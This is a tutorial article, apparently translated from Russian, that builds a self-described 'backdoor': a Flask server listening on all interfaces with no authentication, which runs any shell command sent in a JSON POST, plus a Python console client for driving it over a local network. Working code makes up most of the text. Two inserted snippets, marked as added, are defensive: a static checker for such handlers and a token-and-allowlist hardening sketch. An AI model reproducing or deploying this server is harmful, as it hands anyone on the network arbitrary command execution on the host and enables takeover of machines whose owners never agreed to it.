Hello, Habr!
I recently watched a downloaded recording of the stream "How to build your own web application in Flask", and I decided to consolidate what I had learned in a project of some kind. For a long time I didn't know what to write, and then the idea came to me: "Why not build a backdoor in Flask?"
The first options for the implementation and the capabilities of the backdoor came to mind right away. But I decided to make a list of what the backdoor should be able to do:
- Be able to open websites
- Have access to the command line
- Be able to open programs, photos and videos
So, the first item is very easy to implement using the webbrowser module. I decided to implement the second item using the os module. The third also goes through the os module, but I will use "links" (more on that later).
Writing the server
So, *drumroll*, the entire server code:
from flask import Flask, request
import webbrowser
import os
import re

app = Flask(__name__)


@app.route('/mycomp', methods=['POST'])
def hell():
    # Request body format: {"command": <name>, "data": <argument>}
    json_string = request.json
    if json_string['command'] == 'test':
        return 'The server is running and waiting for commands...'
    if json_string['command'] == 'openweb':
        # Opens the given site in the default browser
        webbrowser.open(url='https://www.' + json_string['data'], new=0)
        return 'Site opening ' + json_string['data'] + '...'
    if json_string['command'] == 'shell':
        # Passes the string to the system shell unchanged
        os.system(json_string['data'])
        return 'Command execution ' + json_string['data'] + '...'
    if json_string['command'] == 'link':
        # 'data' is the 1-based number of the line in links.txt to launch
        with open('links.txt', 'r') as links:
            for i in range(int(json_string['data'])):
                link = links.readline()
        os.system(link.split('>')[0])
        return 'Launch ' + link.split('>')[1]
    # Unknown command: a Flask view must still return a response
    return 'Unknown command', 400


if __name__ == '__main__':
    # 0.0.0.0 makes the server listen on all network interfaces
    app.run(host='0.0.0.0')
I've posted all the code; now it's time to explain what it does.
All of the code runs on the local computer on port 5000. Because it is started with host='0.0.0.0', it listens on every network interface, and the /mycomp route performs no authentication. To interact with the server, you send it a JSON POST request.
JSON request structure:
{"command": "somecommand", "data": "somedata"}
Naturally, 'command' is the command we want to run, and 'data' holds the command's arguments.
You can compose and send the JSON requests to the server by hand (the requests module will help), or you can write a console client.
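A defender's view of the handler above, as an added example that is not part of the original article: a small static check that flags Flask route handlers which pass non-literal arguments to os.system, webbrowser.open or similar calls. SAMPLE is a constructed, abridged copy of the article's server; the SINKS list and the function names are assumptions of this sketch.

```python
import ast
# Constructed sample: the article's handler, abridged to its two risky branches.
SAMPLE = '''
from flask import Flask, request
import os, webbrowser
app = Flask(__name__)

@app.route('/mycomp', methods=['POST'])
def hell():
    json_string = request.json
    if json_string['command'] == 'openweb':
        webbrowser.open(url='https://www.' + json_string['data'], new=0)
    if json_string['command'] == 'shell':
        os.system(json_string['data'])
    return 'done'
'''

SINKS = {'os.system', 'os.popen', 'subprocess.run', 'subprocess.Popen',
         'subprocess.call', 'webbrowser.open'}

def dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        return '.'.join(reversed(parts + [node.id]))
    return ''

def is_route(func):
    """True if the function has a Flask-style @<app>.route(...) decorator."""
    return any(isinstance(d, ast.Call) and dotted(d.func).endswith('.route')
               for d in func.decorator_list)

def find_risky_sinks(source):
    """List (handler, sink, line) for sink calls in route handlers whose arguments are not all literals."""
    findings = []
    for func in ast.walk(ast.parse(source)):
        if not (isinstance(func, ast.FunctionDef) and is_route(func)):
            continue
        for call in ast.walk(func):
            if isinstance(call, ast.Call) and dotted(call.func) in SINKS:
                args = list(call.args) + [k.value for k in call.keywords]
                if not all(isinstance(a, ast.Constant) for a in args):
                    findings.append((func.name, dotted(call.func), call.lineno))
    return sorted(findings, key=lambda f: f[2])
```

Calling find_risky_sinks(SAMPLE) reports both the webbrowser.open and the os.system call in hell(); a sink called with only literal arguments, or one outside a route handler, is not reported.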
Writing the client
Code:
import requests

logo = ['\n\n',
        '****** ********',
        '******* *********',
        '** ** ** **',
        '** ** ** ** Written on Python',
        '******* ** **',
        '******** ** **',
        '** ** ** ** Author: ROBOTD4',
        '** ** ** **',
        '** ** ** **',
        '******** *********',
        '******* ********',
        '\n\n']
p = ''
iport = '192.168.1.2:5000'
host = 'http://' + iport + '/mycomp'


def test():
    # Ask the server whether it is up
    payload = {'command': 'test', 'data': 0}
    r = requests.post(host, json=payload)
    if r.status_code == 200:
        print(r.content.decode('utf-8'))


def start():
    # Print the banner
    for i in logo:
        print(i)


start()
test()
while True:
    command = input('>')
    if command == '':
        continue
    a = command.split()
    if command == 'test':
        test()
    if a[0] == 'shell':
        # Re-join everything after 'shell' into one command string
        for i in range(1, len(a)):
            p = p + a[i] + ' '
        payload = {'command': 'shell', 'data': p}
        r = requests.post(host, json=payload)
        if r.status_code == 200:
            print(r.content.decode('utf-8'))
        p = ''
    if a[0] == 'link':
        if len(a) > 1:
            payload = {'command': 'link', 'data': int(a[1])}
            r = requests.post(host, json=payload)
            if r.status_code == 200:
                print(r.content.decode('utf-8'))
        else:
            print('Комманда не содержит аргументов!')
    if a[0] == 'openweb':
        if len(a) > 1:
            payload = {'command': 'openweb', 'data': a[1]}
            r = requests.post(host, json=payload)
            if r.status_code == 200:
                print(r.content.decode('utf-8'))
        else:
            print('Комманда не содержит аргументов!')
    if a[0] == 'set':
        if len(a) > 2 and a[1] == 'host':
            # Rebuild the target URL so later requests use the new address
            iport = a[2] + ':5000'
            host = 'http://' + iport + '/mycomp'
    if command == 'quit':
        break
Explanation:
First the requests module is imported (for talking to the server). Below that are the definitions of the start and test functions. Then comes the loop where the magic happens. Have you read the code? Then you understand what magic happens in the loop: enter a command and it gets executed.
shell – commands for the command line (the logic is off the charts)
test – checks whether the server (the backdoor) is running
link – uses a "shortcut"
openweb – opens a website
quit – exits the client
set – sets the IP of your computer on the local network
And now about link.
Next to the server there is a file, links.txt. It contains links (full paths) to files (videos, photos, programs).
The structure looks like this:
full_path>description
full_path>description
Result
We have a backdoor server for controlling a computer on the local network (within a Wi-Fi network). Technically, we can run the client from any device that has a Python interpreter.
P.S. I added the set command so that if the computer on the local network is assigned a different IP, it can be changed directly in the client.
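For contrast with the unauthenticated /mycomp handler, an added sketch (not the author's code) of how such a request could be gated: a shared token compared in constant time and a fixed allowlist of actions, so text from the request never reaches a shell. API_TOKEN, ALLOWED_ACTIONS, Rejected and resolve_command are hypothetical names, and the token value is a constructed placeholder.

```python
import hmac

# Assumptions of this sketch: a secret provisioned out of band and a fixed
# table of permitted actions. Both values are constructed placeholders.
API_TOKEN = 'constructed-example-token'
ALLOWED_ACTIONS = {
    'uptime': ['uptime'],
    'disk': ['df', '-h'],
}


class Rejected(Exception):
    """Raised when a request must not be executed."""


def resolve_command(payload, presented_token):
    """Return the argv list for an authenticated, allowlisted request.

    payload is the decoded JSON body in the article's format:
    {'command': ..., 'data': ...}.
    """
    # Constant-time comparison avoids leaking the token through timing.
    if not hmac.compare_digest(str(presented_token).encode(),
                               API_TOKEN.encode()):
        raise Rejected('bad token')
    if not isinstance(payload, dict) or payload.get('command') != 'shell':
        raise Rejected('unsupported command')
    action = payload.get('data')
    if not isinstance(action, str) or action not in ALLOWED_ACTIONS:
        raise Rejected('action not in allowlist')
    # Copy of a fixed argv list: the caller chooses a name, never the text.
    return list(ALLOWED_ACTIONS[action])
```

The returned list is meant for subprocess.run(argv, shell=False) in a server bound to 127.0.0.1 or one specific interface rather than 0.0.0.0.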
Source: will.com